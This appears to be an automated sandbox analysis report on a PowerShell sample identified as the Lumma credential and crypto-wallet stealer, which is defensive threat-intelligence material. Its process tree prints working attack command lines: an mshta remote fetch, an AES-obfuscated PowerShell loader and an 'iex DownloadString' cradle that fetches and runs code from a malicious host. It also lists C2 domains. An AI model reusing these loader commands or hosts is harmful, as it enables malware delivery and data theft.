Windows
Analysis Report
00000.ps1
Overview
General Information
Detection
LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 2800, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1908, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 3844, cmdline: "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 2996, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('<AES ciphertext as a 1536-digit hex string, elided here>');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5812, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7176, cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7184, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8032, cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- svchost.exe (PID: 4420, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["necklacebudi.lat", "hushedocenahu.click", "crosshuaht.lat", "rapeflowwj.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl7"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary | |
---|---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
Source: | Author: Florian Roth (Nextron Systems) |